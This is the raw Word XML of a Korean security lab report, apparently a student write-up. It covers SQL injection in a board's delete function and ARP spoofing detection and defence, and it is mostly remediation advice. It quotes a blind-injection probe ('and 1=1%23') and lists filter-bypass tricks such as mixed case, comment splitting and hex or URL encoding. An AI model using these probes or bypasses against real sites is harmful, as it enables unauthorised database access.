      <w:pPr>
        <w:ind w:left="804"/>
      </w:pP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게시판의 글을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확인할 때는 이미 처리가 되어 있지만 글 삭제의 경우 게시</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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글의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 xml:space="preserve">값이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>로 넘겨진 후 별다른 처리 없이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그대로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>문에서 사용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사용 전 전 처리의 경우는 로그인 예시와 같이 보안 정책에 따라서 미리 처리할 수 있는데 그 후에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 xml:space="preserve">값이 따옴표로 묶이지 않고 그대로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 xml:space="preserve">문에서 사용되면서 따옴표 없이 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">num </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">값 입력 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and 1=1%23</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 덧붙이는 방법 등과 같이 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>blind injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 가능성이 남아있음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따라서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">문에 사용되는 모든 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">는 입력 받은 뒤 전처리를 하고 전처리 후 사용을 할 때 항상 숫자 형태인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>paramater</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고 하더라도 따옴표로 묶어서 처리를 하도록 하는 것이 필요</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00CD0B2D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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QL Injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>기타</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Magic_</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outes_</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pc</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>나</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure coding</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 한 것과 같이 따옴표나 문제가 될 만한 특수 기호를 처리하는 함수가 존재하기 때문에 그러한 함수를 사용해서 입력 받은 데이터를 전 처리하고 모든 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>paramerter</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 따옴표로 묶어서 처리하는 방식이 안전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전 처리 과정은 S</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 사용되는 특수 기호 들이나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>명령어로 사용되는 단어 같은 경우 어떤 식으로 처리할 것인지 정책을 결정한 뒤 코드에 반영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단순히 문제가 될 만한 특수 기호나 명령어만 처리하는 것이 아니라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>을 우회해서 공격할 가능성을 고려해야 한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예를 들어 대소문자를 섞어서 공격하거나 주석이나 괄호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함수 등을 이용해서 보내는 데이터에 F</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iltering</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 대상이 되는 문자열을 쪼개서 보내거나,</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL or Hex Encoding, %을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이용한 우회 등을 시도할 수 있기 때문에 가능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방법을 숙지하고 이에 대한 전 처리를 해주거나 또는 그러한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이 가능한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방화벽이나 보안 장비를 사용할 수도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미리 작성되어 있거나 사용자가 작성 해놓은 저장 프로시저 같은 경우도 공격자에게 노출이 될 경우 저장 프로시저를 이용한 공격이 있을 수 있기 때문에 이와 관련된 문자열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과정에서 고려할 필요가 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRP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입력 값의 크기 제한은 클라이언트에서 할 경우 P</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>roxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 서버나 P</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 조작해서 서버에 보내는 방법이 있기 때문에 서버에서 체크하는 것이 안전</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7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>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 오류 메시지가 직접 사용자에게 보이는 것이 아니라고 하더라도 문제 발생에 대한 메시지가 오류에 관련된 내용을 지나치게 상세하게 설명하고 있을 경우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입력한 데이터를 처리하는 구조를 공격자가 추측하기 쉽게 도와줄 수 있다.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따라서 오류와 관련된 내용은 어떤 것 때문에 문제가 발생했는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상세하게 기술하기보다 문제가 발생했음을 알리고,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다시 이전 작업을 시도할 수 있도록 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRPr="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00901DE7">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이러한 노력을 했음에도 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 우회 등을 통해서 공격자가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>공격 코드를 실행할 수 있는 조건이 되었을 때</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>그 행동을 제한할 수 있도록</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 서비스를 통해서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 명령을 실행할 때 서비스에 필요한 권한 말고 다른 권한이 없도록 권한을 세분화하고 불필요한 권한을 낮추는 작업도 만일에 공격을 당했다 하더라도 피해를 줄이거나 막을 수 있는 방법이 될 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901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D88" w:rsidRPr="00E151D6" w:rsidRDefault="001A2D88" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>네트워크 보안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E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RP Spoofing</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34273B9B" wp14:editId="60266FD1">
            <wp:extent cx="3599327" cy="1775460"/>
            <wp:effectExtent l="0" t="0" r="127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. BT에서 웹 서버에게 ARP Spoofing 시도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58" cy="17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ACCA707" wp14:editId="78309D84">
            <wp:extent cx="3599815" cy="2232660"/>
            <wp:effectExtent l="0" t="0" r="63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0. 서버단에 있는 BT이 웹 서버에게 ARP Spoofing을 했을 때 IDS에서 패킷 확인.pn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2" cy="2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B829137" wp14:editId="7B09A6B2">
            <wp:extent cx="3599327" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="127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. BT의 MAC 주소 확인.pn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3" cy="1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탐지 방법으로는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>를 이용해 탐지 가능</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버들과 같은 네트워크에서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 xml:space="preserve">공격을 시도 했을 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 들어오는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 xml:space="preserve">들을 확인해보면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을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6">
      <w:pPr>
        <w:ind w:left="760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69BF38E" wp14:editId="37DB7FA7">
            <wp:extent cx="3599180" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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 IDS가 없는 네트워크에서 공격을 시도했을 시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58" cy="17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34B8CAA" wp14:editId="046016F3">
            <wp:extent cx="3600000" cy="1022400"/>
            <wp:effectExtent l="0" t="0" r="635" b="63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1. 라우테에서 ARP 테이블을 확인하면 동일한 MAC주소가 있다면 공격 의심 가능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3EB7BB3D" wp14:editId="2996EC54">
            <wp:extent cx="3599815" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="63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2. BT의 MAC주소 확인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10" cy="1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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 없는 네트워크라면 공격이 의심될 때 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Router</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인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이 때 동일한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C주소를 가지고 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가 있다면 공격 의심 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6">
      <w:pPr>
        <w:ind w:left="804"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E062573" wp14:editId="2CD78A4A">
            <wp:extent cx="3599528" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="127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4176" cy="2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 xml:space="preserve">AI </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic ARP Inspection]을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">사용해서 만들어진 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 비교해 매칭되는 아이피일 경우에만 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Switch</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통과시키도록 하게 만들면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AR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>poofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 어느정도 방지할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6">
      <w:pPr>
        <w:ind w:left="804"/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817A86D" wp14:editId="7EA5297F">
            <wp:extent cx="3599632" cy="1889760"/>
            <wp:effectExtent l="0" t="0" r="127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5" cy="18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6E948B12" wp14:editId="53A82680">
            <wp:extent cx="3599110" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="190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92" cy="16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R</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Static</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Routing Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 등록하게 되면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을 방지 할 수 있음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9F55079" wp14:editId="631CFB9C">
            <wp:extent cx="3600000" cy="1008000"/>
            <wp:effectExtent l="0" t="0" r="635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0819BB99" wp14:editId="5E3E87F7">
            <wp:extent cx="3600000" cy="2358000"/>
            <wp:effectExtent l="0" t="0" r="635" b="444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2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">또는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">주소를 확인하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tatic</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 등록</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">하므로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP Spoofing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방지 가능</w:t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P Spoofing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F491154" wp14:editId="512A8441">
            <wp:extent cx="3600000" cy="2181600"/>
            <wp:effectExtent l="0" t="0" r="635" b="952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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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공격이 의심된다면 먼저 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP Spoofing </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격 탐지 방법을 이용해 탐지,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">방어 방법으로는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공격에 대한 방어 방법을 사용하고 추가로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>기능을 사용, u</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
